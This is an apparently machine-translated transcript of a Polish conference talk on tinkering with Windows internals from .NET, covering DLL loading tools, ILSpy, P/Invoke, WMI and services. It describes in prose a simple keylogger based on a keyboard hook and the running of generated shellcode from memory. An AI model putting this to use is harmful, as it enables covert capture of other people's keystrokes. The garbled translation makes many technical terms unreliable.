Taniec Z Całym Ciałem W Gipsie

Hello everyone! If anyone has survived so far, it's the Polish Championship. Which one did you play yesterday? The North? Why so fast? Bravo for Mac, who is still running the party. Oh, I switched it on. Since October is the month of security, we will talk about security. One of the tools that allow us to assess this security is risk assessment. I have just followed the Polish standard PNN 180022011. So, how does it look like? It is the simplest of methods when it comes to risk assessment, only because we have two criteria: probability of a certain threat and the severity of the consequences. If we have small probability, then the risk is small. The same with

small and medium. If we get small here, it means that we can take action without any worries. In the case of medium, it would be worth thinking about how to reduce this risk, while in the case of large, It's best not to take this action at all. This introduction had nothing to do with this presentation. Okay. Here, from the beginning, I asked: "Do you know my wife?" and my colleague answered correctly: "I suspect that if someone rides a boat, it very often responds to 'it will be dark soon'." Exactly. It also comes from this company, from this "rrr". If someone hasn't watched it, I encourage you, and the best is this dubbing with Adam and Eve. My

topic is "Dancing with your whole body in plaster", which is hacking from .NET level. So first of all, before I tell you a few words about myself, I am a student of IT at UZ. Greetings to my managers who are watching now, maybe they are not watching, they should be at classes and I am not. Besides, I have a diploma in safety and hygiene of work. I also have a B.H.P. technique, but I did it before, I'm a piece of shit. I'm also a software developer in Gemotial. I used to work in Security B-Sides in Poland, then I decided to get sick, but my doctor told me in September that I'm not sick anymore, so

maybe I'll come back to it in the future. Maybe we'll take care of Wrocław, apart from Warsaw, if they're willing. Why not? Please? No problem. Besides that, I'm crazy about channels. You can find me on the "Lon" list. It's a channel I started a month after I started to use the Internet. Generally, when I had a computer at home, I decided to check in one old book if there is still something like ERC. It turned out that there is. And I will never die. So I have this channel, in a month it will be 10 years old, I am very proud of it. Besides, I breed ants. No, seriously, I'm not kidding with these ants. This is our formicarium. One day my

fiancé simply brought ants. I fell in love with these ants. Here we have a leech and here we have a few representatives of the Lasius niger species. An interesting fact: they nest here, and to make it dark for them, there is a box on the router. Maybe. I know where this "packet lost" came from. Let's start with the title. "Dance". To be honest, I can't dance. Let's start with the dance. I remember once I found a document. Eric S. "How to become a hacker?" Generally, it's the document where they write that most hackers should practice Hata-Yoga, play on an instrument and write in Python. And there was something like: yes, there are operating systems in this world, except for Unix. But they are available in binary code.

You can't read the code, you can't change it. Trying to learn how to hack Windows and MacOS is like learning how to dance with a plaster on your whole body. So this man was my motivation, and as you know, the creator of Argon Files can't be wrong. I can't dance, and when it comes to security, I only use BHP. And security is the only thing that connects me to my Zirc friends. But let's go back to the quote analysis. The main problem is that the man said that closed code, systems that are available with closed source code have two main problems. The first one is the lack of possibility of reading the code and modifying the code. To be honest, I haven't seen

such a third understanding here. So, if it wasn't for... You're stuttering when I'm stuttering, right? For people, such volunteers, it is enough that they can look at this code. that they can read it. But the truth is that if they want, they can do it anyway. We have binarken, so they can look at it this way, and if they have a little more money, even this way. And now a question for you. Here I have a pyramid. Who of you ever read an interesting fragment of code? Okay. And who of you ever read the entire code module? Who's the last month? Oh, there are still some. And who's from the currently used release? The gentlemen there probably do nothing, they only read the code. And

from the last push? So now I have a question: who has recently read the whole library? Any programming? These gentlemen two. And who has read all the programs that are installed in the latest versions? No exaggeration, right? And here this man says that only someone should read the whole operating system, because if we read a piece, it gives us nothing. And soon there will be a situation that we are still at the level of the code, and what is after this code. I'll give myself some peace. And who of you has recently read a fictional or technical book? Hands up. They count too. Some prefer to read. And listen, from this small survey I came to the conclusion

that hackers prefer to read a fable book rather than a complete source code of every library version they use, and what to think about the operating system. We have a living example of this here. And I'm not saying that these modifications happen, some people modify the code, but you can modify both the code directly and the code that is already complicated. And when it comes to such Reading everything, you know, creative minds are a valuable, rare raw material. They should not be wasted on repeated code indentations. There are so many other problems waiting for a solution. The problem is that if we read the code all the time, we will run out of time to

create it. Currently, there is so much open source code that we have no time to think about it. Not to mention that we use source codes in a circle. which are delivered by third parties and we simply add it as DLL. If someone wanted to read everything, to be able to cut his hand and to have this hand, I wouldn't let him cut his hand for his code, for what he generates when it comes to the package, etc. If we take the fact that these people are looking and seeing, it's like a coincidence. I took a gap and I took it off the demotivator. In the gap, in the place of an accident, there is no help, they are just looking for

sensations. The same is the case of errors in programming. Sometimes people, looking at it, if they even find something, they don't know anything. For example, because they are in the service or they need zero-day in the future or they don't want to cause people problems. Or even worse, they will go to the media and do some crazy stuff like "hey, you know what, they are the ones who have a piece of a hole". Aha, I was not supposed to use the word "hole". To modify the operating system we don't need a source code. What I've shown here are just a few examples of how to influence the operating system without modifying its source. In Windows, for example, libraries, especially libraries that are sitting in the

corner somewhere, are a modification of system frameworks. In C#, I recommend using sharpshare. We have all kinds of system services. We have writing of controllers. If we are in the controllers and we write something that has direct communication with the controller, we work in kernel mode to the extent that if we do not get an exception from there, we unfortunately have a blue screen. Besides, in WMI, which someone will come up with at some point, we will play a bit with it. We have a system register, where we can also mix something. We have all kinds of wrappers and the possibility of writing them. We can always play debugger. An example of people who play with the system is Sesinternals and

his tools. They just talk with WinAPI literally in his language. Let's talk about safety. We've learned about dancing, now let's talk about safety. I took a dictionary from Polish language and it says: "Safety is a state of lack of threat". But when I wanted to see what threat is, they told me it's lack of safety or lack of sense of safety. To understand recurrence, we need to understand recurrence first. Angola's security is divided into safety and security. So here is more of a sense of security and here is more protection against danger. We don't distinguish it. When it comes to people from security, the first thing that comes to mind is us.

BHP workers, I am a BHP worker from my profession, besides being a developer. So these are people who go with all these risk assessments, characteristics cards or control lists and check if no one is doing anything rude. And besides, they also give out some protection funds and scare people at trainings that they will hurt themselves. Thank God the watch is intact, because without a watch, I'm like without a hand. But there are also other people from the security. And these are the "gentlemen". We have this guard here and this one here. This man is armed, you know, some gatekeeper, you know, when he brings cash to the bank, these are also such gentlemen, armed to

the teeth, afraid to be afraid. These are our security, and this is the man who takes care of to give access to these resources. So it would be more like an admin in our environment. Mr. Pechat. And we also have such an e-protector. So that's you. These are people who are simply secured in a slightly different way. Their monitoring is mainly logs and so on. You don't have visual monitoring. And your telescope stick is some firewall and cut-off of movement. Generally, you are the ones who try to prevent these threats, but they are more "E". So, "E" security, you can say, to separate from those security, that is, emirates with the "security" on their jackets. There is also "E" dad. Mr.

Dad. This is the kind of person who... There is a security specialist here, so he probably knows more about it. Congratulations to the president. As for these gentlemen, they are gentlemen who go to fairs, so you can say a bit of red teaming. If they catch some unpleasant situations, they call other services or inform the person responsible for it. We also have such a "cow", or you can say "a cow". So it's a so-called nightstand. It's a worker who sits somewhere, sewn up at night in a server room and knows that when these or those lights light up or when he sees red logs, he should call the specialist quickly. Another "who is" is a security guard. Maybe not so much "who", but "what". Because this

is a security guard. It is an electrical device that protects the whole electrical network from the power outages. It burns so that everything around it does not burn. I will go a step further and show you what a dangerous wire is. It is a dangerous wire. When we throw a top and entrust the safety to a tube or other wire, you will change the safety wire into a dangerous wire. The current flows, everything is great, but... You can lead to tragedy. This network will be overloaded and will be ignited. No CloudFarm will help anymore. So my information is this: do not exchange this Pika on your own. Unless you are electricians and you know what you are doing. Another thought:

you have the object unprotected. Okay. Since you know each other better in security, and I may touch you a little, I will tell you. So touch, touch, what the fuck, right? You know what, when I started to deal with it, it was competition for Java on the one hand, and on the other hand, it was a place that, you know... First of all, we choose Linux, because nobody uses Linux, and when you start to rotate in such an interesting environment, you start to choose Windows to differentiate yourself from others on the other side. It was the same with me. Times change, hell freezes, and if you've tried to be anarchists against freedom and choose Microsoft, it turns out that Microsoft can be more

free than those free. So here we have .NET Core. And listen, when Java starts to be paid soon, it may turn out that soon you will all be writing in .NET Core under Linux, using Azure and so on. We have everything about docs.microsoft.com or old MSDN. I will show you some screenshots from there later. It's probably better documentation than MAN. Besides, we have our own "dirt" in the dotnet environment. It looks like this. I don't know if you were at the presentation of Paweł Łukasik about Radar a year ago. This was a man who used to deal with .NET and he came up with this portal. Now Piotr Stap took over it, because generally this year everyone takes over

something. If we look at .NET, we have IL there. And our main asthma is IL. IL is interpreted into asthma, by the way. Unless someone just compiles it into something else with NGN. You can interpret it through CLR or some alternative environment. In the case of C#, we have memory management through CLR. And we have memory management when we want to. When we want to, we don't have it, because we can just paste half of the code in the UNSAFE section and everything will be OK. Generally speaking, when I was at university and I was doing "propaganda presentations" because I was in the science circle of UZ.NET, I told my students that .NET as a platform is safe, fast and

multilingual. And imagine that I managed to find some confirmation for everything. As for security, I once found a Kaspersky report that fit me politically. I don't remember which year it was, I just made a screen from the website. And of course I noted that Java is bad and not good and the first two are yellow, so the biggest holes and the most is from them. Then there is Flash Player, what else do we have? Adobe, Apple, iTunes, and other such things. And it turns out that there is no .NET here. And only after years, a certain person came to my mind: "Do you know why there is no .NET in such reports? Because no one just checked it." So sometimes it turns out that it

is better to choose something that no one cares about, and then it is safer. That's why I had Windows Phone for some time, until it flooded me, and now I'm on Apple. And I'm already catching up with these statistics, unfortunately. As for the speed, fortunately, we are faster than Java. I will try to click on it. Of course, it opened three times and it is not on the screen yet. Here we can read how a specific platform dealt with specific problems. Let's compare with C++, it won't be so beautiful. Okay, this failure is not so bad. Let's go back to Java. It is very often that memory is weaker. Maybe not in this example. But when it comes to

CPU, it hits a lot of platforms on the head. Why? Mainly because they want to save money on Azure. Okay, I'll switch it on. Okay, I'll click. When it comes to multilingualism, most of the languages in .NET are C++, C#, Visual Basic for .NET, F#, if you prefer more functional languages. But suddenly it turns out that there is a lot of it, and it's just a part of the screen. And if someone would not have enough of it, they can always implement their own language, because the entire platform, when it comes to the launch environment, is standardized. CELI, Common Language Infrastructure, is a description that describes how our language must behave after compilation to be properly interpreted

by the .NET platform. simply standardized by ECMA 335 or ISO AC 23271. In addition, everyone can run their own environment on their own compiler and there are no patents for it. Okay, I see that everyone is already asleep, so I will not talk about it on the dotnet. If someone would be interested in it anyway, I can suggest three books. The first one is this one: CLR via C#. It's a great library for the online environment. If you want to have fun, and not necessarily politely, this is something that you have on your desk, under a pillow, etc. The second book hasn't been published yet, it's still in pre-order, but because Konrad Kokosaton wrote it, he couldn't screw it up, it's simply impossible. Because this

man has so much knowledge about it, it's just a small head. In addition, the lady who wrote "Garbage Collector", the Microsoft one, was a reviewer of this book, and this review was also very positive. Something else was created, I put this book only because it is, because there are very few of them in this range. I was so excited, I even had to do some of the things from this book, but it turned out that most of it is shown in what way specific APIs are generated and how to send a HTTP question and get an answer. The only thing that was different was the links. If we have enough time, maybe I'll show you a little. Okay, let's move on to hacking. In my opinion, hacking is

more of a modification of something that already exists, that we already have. We will write some kind of template for some system command, I will show you how to do it. We will set something in our system from the level of our own code, something more to play with in the system. We will use system frameworks, we will write our own system service and at the end we will maybe start something ugly, as long as there is enough time. Now it's time for the meat. Let's say that if Visual Studio won't answer, I'll try to answer the questions from the room. I've set everything up earlier, but knowing life, you know how it is. It

worked yesterday, but you know what? The fact that something worked yesterday, I already know this platform enough that I just don't trust it. No, you know what? .NET is very stable, but when it comes to Visual Studio, it's all fused. I didn't have to add any more, I managed to turn it off half of the time, but when I started turning it on, it turned out that the project didn't start, and I didn't want to add anything to it, so I turned it on again. Which ones? We'll see. Cool, we'll see. I mean, I don't remember when I've even started the code ending. Cool, then we'll sit down later and try to add it to make it

work. Okay, when it comes to Windows system, some people know something like DLLHEL. We put a library in a wrong place and it charges. If we want to prevent this, and we are developers, or we have Windows SDK or Visual Studio, we can use the tools GATS Util and just put this DLL in there. Then we are sure that it will take it from this place in the first place. Where are they stored? C, Windows, Microsoft.net, assembly, gats, mseal. I'll try to show you a demo now. I'll start with... no, not the command prompt. This one is cool. OK, you can see something here. OK. Now there is fuzz, like fuzzing. Log, like log. And VW, like Volkswagen Golf. OK. This

window, of course, showed up here, not here. I have them here, I'll give it delete. Okay. Is there a delete all? There is a delete all. Refresh. Okay, I'll try to start this tracer, which my friend was talking about. Maybe not a broadcaster, because I'm looking for a tracer. Okay, start. I'll discuss this tool a little later, but what I want to show you for now. Aha, of course, I look with the window and it showed up wrong here. Was there something about pinging WP? Okay, run.

Will it work? No, it didn't. It's working. It's enough that it's loaded. I'll close this setting. And now refresh. And here we can see what DLLs have been loaded and where. Okay, am I recognizing something? Okay, let's open something from the outside first. You can see what's here. I hope there won't be any problem. We have information about the loading operation. We have the locations where the DLL was loaded, with what parameters, with what locations and all general information. Here we have that a set was found searching for GAC RAM. But if we take another one, the one that I know is not in GAC yet, I've already downloaded it. Something of my own, for example this one. This groundwork loaded directly

from this location. This is the location where I have this project. I've compiled it in Relase, so it's in the Release folder. It loaded with this config, because sometimes it turns out that these configs are in different places depending on where the application is and people will pull this config. So here we can verify it. We can also say what it loads and so on. Now I can try to load this library and start it from the disk. How much will it allow me to do it? Or I'll give it peace of mind because I have a problem with navigation. Okay, slide display. Another thing we can check is what DLLs are loading. This is Asyn Spy. I'll also try to start it. I

have a shortcut prepared somewhere here. Okay.

CD, here is the location. And now we have... the catalog name is wrong, because it is not the catalog name. And now we can go with this asmspy and give it some binary for the parameter. For example, I don't know if you will see it now, I will copy it as a path. Well, no exaggeration, man. And here we also have part of this information, Our binary refers only to WinAPI in this case. Okay, that's it when it comes to DLL. So if you're looking for a place where something is loading and you're not sure if it's this one, it's worth checking it out here. If this cool tool didn't work for you, there are two possibilities. Either in the settings

there is no logged in, or you need to set up specific things in the registry. Here I prepared a bit of PowerShell. that will set it all up in the registry. And the next thing is that the vlog path folder must exist, otherwise it won't run, so mkdir-fusionlog should work. Okay, I'll try to go back to the presentation. Okay, that was the fusion log. Another interesting tool that will help us in the analysis is Tune. Has anyone heard of Tune? It's a very cool tool. I'll go back. The tool of Konrad Kokosy. It looks something like this. What we have here is a piece of code and we can see it in "how much" and in "as much". So we have a piece of

code and we check how much it will be translated into "as much". I had the previous version here, but it turned out that an update was created while I was working. So I decided to download it too. And listen, I tried to start it and bang. Not for you exception, as I say. So, you know, when a blonde doesn't read how to use a tool and tries to use it. Guess what I did wrong. Okay, maybe the first question: has anyone ever used Tune? Okay, no one. So, what I did was I tried to load a C# file instead of an XML file, which looks more or less like this. So here we have some

beginning and parameters and we just paste the source code here, right? So, yikes, it worked later. I'll try to turn this Tune on. It will be a bit "Mexican" because it opens in such a way that I can't see half of the window. I was wondering at some point if I should report it. Maybe if I switch to that screen, it will be visible, because I can see a piece of the screen here. Okay, so here was Shift and right to have "transfer" and arrows here and only now I can transfer it somewhere here. OK, it's also cutting, but it's weird by default and you can't resize it, but later in this version it seems to be possible. OK,

I have a resize. So what I'm doing now to make it easier for myself, I'm opening any sample so that it doesn't fall out when opening. Then I'm looking for any, maybe locally here, so as not to disturb any Plexi Sharp. Well, at least this one, Open Visual Studio Code this time, so as not to cut. OK. Ok, the simplest one, what could it be? Where am I? Show me what you have inside. And here you can choose a platform and debug or release. First I'll start it in debug. Ok, something is going on. Skip compilation. Will you pass, ma'am, or not? Invoke method. This argument is not working, so it will break, never mind. The only thing I wanted to see was

the amount. So here we have how the amount code looks like. We have here the function we declared. We have here the local parameters of this program that were created. And a dance. Here we have it in the ASM version. It's a pity that the old version had line numbering, but it's not here anymore. So I'll try to copy this ASM to VS Code. Okay, I have it in debug. And I'll try to run the same thing in the release. Run. Log. You're going. Of course, run will fail, but that's not what I mean. OK, running ending true. We have a new one. I'm copying it here just to show you the number of lines for

this piece. In the case of debug, we have them with empty 57, but it ends somewhere at 55. and here 44. Notice that there are fewer lines, so you can analyze how your code is optimized with default flags. Of course, later it will be possible to modify it, it is available as a source code, so there is no problem. Here, what we can do is edit the code directly here. How do we change it? We click "Run", it will analyze this code again. I recommend this tool to anyone who wants to analyze or optimize their code based on the binaries that are thrown at them. Another tool is ilspy. You probably used ilspy, right? No? Is there a dotnet

server in the room? Okay. Let's load ilspy. Where is it? Okay, I have to go to the pulpit again. There is a magic folder. with shortcuts. Presentation, shortcuts, ilspine. Ok, now there is a lottery. Where will it appear? Where is my mouse? Ok, I can see it. Ok, I will load this CHK_Dump, which I will use later. And, oh, here it is. When we have a binary, we are able to load it and see it both in il and in C#, and in a mix of two of them. And it often happens that it's totally 1:1 what we wrote. Okay, maybe I'll run some more. Intracert, bin, debug, Intracert.exe. Unfortunately, I see more than you. So here we can see

what we created. We have, for example, a hop list.

We can see what methods we created, what variables we used. Besides, we have information about things that were linked. I will also try to develop the types that were used by our application. Variables, properties, and also the code itself. Methods, if I manage to get a method from here. MainWindow. And, for example, we have some variable declarations here. initialize component, which is called from the outside. But here we have an example of the onchecked method, which in the case of IPv6 turns off the fourth parameter, so you cannot simultaneously force IPv4 and IPv6, and the parameter j, i.e. the list of hops through which it passes, is also set to false, because this feature is

only available for IPv4. So I can, without having access to the source code, load the DLL or the EXAC and see what's inside. Here's one of the system ones, so we can load the system ones, we can load the SGAC and analyze our 1:1 code this way. Unless someone was rude and confused us, but we don't have any bad people around, right? I think so too. So, when it comes to ilspy, When it comes to CMD wrappers, I've just shown you my tracer, to which I've put a GitHub code before. I'll just switch to the second screen to change the project. We have the main window of the application. What do we have here? We create a model that we bind to

the view later. And what do we do next? I have a separate DLL that does magic. Here I have a wrapper for CMD. If the text comes from the output, it is added to a specific text field. It also informs us about the exit, so that we can press run again. and we throw an error code. We have a function runCMDProcess. Here we have a simple start process, in this case a little asynchronous. I've wrapped the basic events to be able to talk about it. And in fact, this way, through the info process and the start process, we are able to run any system layer recommendation in the case of CMD. If we have a

text layer here, what about a graphic layer? Let's move on to something like this. I create a simple program like class library. I sign it assembly so that my system trusts it. I make such a command and I can do additional things. Now, this was the MyExt project. The new Visual Studio instance is loading. How long is it? 38 minutes. Okay, I'll make it. I'll be a body. Loading solution project. Maybe right there, because it's small. I'm at the stage where I can't move the window because I've moved to Visual Studio. So, is there any question? Because I promised that if it closes, then... Okay. Okay, so... I'll wait. Yeah, I have it. I have a

question, because the computer is not working, so I just want to say. It's lagging because my computer doesn't work with the fact that there are three Visual Studio instances plus Office and hell knows what else. Open folder in File Explorer because I will need it in a moment. What do we have here? Notice that we have a very, very simple thing. First we have a function. In this case, I just chose to add something to the menu. In the first step, we check whether the menu can be shown. Then we create this menu and when we click on this menu, we call What does this function do? It goes into the catalog, then it collects all the files from it,

transfers the catalog higher. If after this operation this folder is empty, it just removes it. The trick was that if you unpacked some zips, it very often created an overclocked catalog, which was not needed for us, so at some point I just used it. To avoid getting stuck in command line again, I downloaded an application called Server Manager. I will link it later. I will load this extractor. I have it. It will allow me to install and register this particular extractor that I have built. So we have install and register for 64. And now, I will have to... I don't know, maybe I'll take this window. Okay, are the properties large? Okay, there is one file here. Okay, I'll copy it. And

now, if... Here I have a new command, extract. As you can see, there is no properties copy, and this file appeared here directly. assembly-info.cs, because it was a copy of this properties, so we had exactly the same assembly-info.cs. Next thing I will do is go back to this application. I will click on it and uninstall it. So server unregister, server uninstall. And now when I try to do the same thing, notice that my tool is not here anymore. So it was live. I'll finish it now. Bye bye, I don't need you now. Demo doesn't work.

I'll remove this shortcut from here and move on. If we want to create our own native code, we have to export it. So if we create we need to remember to give declar space dl export int cd ecl so that we can run this function from C++. I gave extern c here because I didn't want this name to be decorated in any way. Another thing to do is We can use our solution as a dynamic library and compile it as a DLL. We use it directly in this way. DLL import, here in the string we have a FIPE, so we give it and we also give the call convention. In this case, we took CDECL, so it must

be here. If we put this private_extern static int here, then we can later call this function in our already managed function and it will be a git. But to be honest, it's not enough. Another thing we have when it comes to BeamVoke is that we can write a hello world. When I bought this book, I thought that something was wrong with it, so it will be this piece of code. so it is from the greyhut C#. What the lock did here is that it was able to detect the operating system in .NET. In the case of Windows, the message box is running, in the case of Linux, the print is running. Due to the fact that it was able to load DLL import from libc. I honestly couldn't

do it under Windows. Okay. As for the painvoke mechanism, let's do something more interesting. I will show you a piece of my favorite project with PaintVoke. We have a system time here. The first thing we do is to take some time and set it. If it is set, we let it be set. If it is not set, it is difficult. It is known that it requires administrative rights. Refresh OS time, how does it look like? F12. What kind of magic is going on here? First, we check if this server exists, we download it via NTP, then we set the system time through helper, which was downloaded by this NTP. What we have here, and it's interesting when it comes to this part, is that

if we have this system time, we need to remember that it is layout-kind-sequential, because it often happens that these structures must be packed in memory one by one, because then the functions we have from WinAPI can misinterpret it. This code is also available on GitLab, under this link.

Another interesting thing I want to show you is the simplest keylogger. It turns out that if something is available to WinAPI that is Microsoft, they don't care what it is. So I decided to check if the simplest keylogger in the world works without any antivirus. And surprisingly, it works. CHK_Dump, that's what I called it. What I did here is I just plugged in the keyboard hook and just dumped everything into the file, literally sign after sign, because I don't know when I'll be able to beat it, and I still want this file to be readable, to be readable, so that there is no garbage there. So I just open the stream every sign. I'll try to start it. As you can see, it's not working,

or at least it didn't work yesterday. OK. Now if I write something... controller, notepad... Where is my mouse? Notepad is not open where it should be. OK, that's enough. Now I have a good situation. I will stop this process at this moment. It's good that it disappeared here, but fortunately I have stop debugging. Otherwise I would have been looking for it everywhere. OK. Now I will try to enter... in the place where the binary... no, not to bj, for God's sake, binary. It went to the release, so here. And in this text file... I have something like this. Here I have this "dog entered the kitchen". I have special characters here, because I didn't add them because it's a simple

code from Minapi. But notice that there is no "he stole it and a quarter of a meat" anymore, right? What happened after the stop. Nothing was called. Nothing. I was surprised, I thought I would be beaten in the back, but not yet. I decided to go a little further. I took this function directly from Set, Window, Hook, X, Function, etc. It turned out that everything was beautifully described on the Microsoft documentation pages. I didn't have to think about anything. I see that I have 4 minutes left, so I will try to be as quick as possible. System register. You can easily ask it in this way. I will not show it because I have 4 minutes left,

so I have to be very precise. I will show you something more interesting. As for WMI, I wrote something about WMI, but unfortunately I got the information that something went wrong. It often happens that we run something in WMI, we have our code, but this code works only for a specific operating system and nothing else, because something has changed. Besides, it may turn out that we have different applications and it doesn't work. So it is a very good thing to check yourself when using WMI Explorer whether we still have the possibility I'll give it a connect here. Do we have the possibility to use this particular question? Most of the time I always take it from here and we can ask

a lot of things here. And then, once we've got it, once we've chosen a specific thing, we get something like WM and Code Creator, we choose a specific thing, And here we have a code that we have to directly paste. In this case, we have a false script, but we can quickly change it to a C# code. Copy, paste and it works. And suddenly it turns out that all these super cool system tools that were added to the computer world or some other format were generated in this way. I had more demos on this topic, but I really don't have much time left. I have two minutes. I want to show you something dangerous. You can still do

something with it. So, without further ado, I decided to use it to create my own system service. Here I am downloading information about disks. And then I will do the system service, which will benefit from this data. So I create a system service. Remember to set the system service installer to local system. You will have more possibilities. By default, you do not have a startup project set here, so it cannot be launched. In my case, it is a file broadcaster program. The installation method, I would show you the installation, but unfortunately we don't have much time. Install Util.exe and here we have our exec, which we gave there as a startup project. And here's another fun

fact. This window comes from something like developer command prompt for Visual Studio. So very often, in order not to deal with system settings, in order not to deal with your environment settings, with its environments, etc. Here you have an additional prompt command, which will be linked to all the things related to Visual Studio, which are related to strictly .NET things as well. Earlier I showed that after I called this command, it appeared on the list. It started to spit some logs, and then I uninstalled it and it was gone. I can also show that in fact I don't know, some disk, small one. Okay. Okay, the system warns me that the write has actually copied here. You can

run it, everything is on GitHub, just ask in case of problems. Okay, and I decided that I will show something ugly at the end, so I will give it a payload. I downloaded such a very ugly tool for M and generated such an exploit. And then I tried to use it in my application. I decided to take this payload, copy it, lock the memory and then run it. And it turned out that after compiling I had... Seriously? Are you fucking kidding me? Yes? - If the generator is a protocol, it always works. - I think so. - Yes. I wanted to know if the payload was created by itself in some way. I would lose my sanity in hacking, so I don't want to

add it. At least for now. So that's how it looks. I've added a command here. And here, when we expand it, it's just a raw value hex, written from this payload. If someone really wants to go one step further, there is such a place directly in GitHub. You can go deeper, read, etc. I had plans to communicate with all these frameworks for the Secs, but I didn't have time. I thought it was boring, because most of it was just calling some web API. If you are bored of using Windows, .NET, etc. you can install KaleGo in Windows. To sum up, because I'm running out of time, we managed to talk about .NET, we looked at how IL and ASM look like, we didn't bother about

WMI because there was no time, some service was turned off, we've wrapped some CMD, We fed our cat with vitamins and we know where to look for information. Since I'm two minutes late, there will probably be no more questions. Thank you very much. Here you have the data for me. I don't know if you can see them. In case of what, I should still be here for half an hour. The cat is here, but from what I see, the colleague who stalked me was already able to handle it. And I give the floor to the president. Thank you very much.

Okay, Piontkosia, so for you, your first SBA diploma as a pro-legend. A notebook, a pen, first one to get, not to take. And stickers, also to get, not to take. I got the first one at the registration, what's the first one about? But as a pro-legend. Okay, so now we need literally... Can I say one more thing? Sure. It was said earlier that my predecessor was the first "Zapchaj Dziura" No, he wasn't the first "Zapchaj Dziura" The first "Zapchaj Dziura" in 2013 was Borys Łącki, so bravo to Borys! And you know what? He was such a "Zapchaj Dziura" that he appeared every year officially So, big bravo to him, it was a really great purchase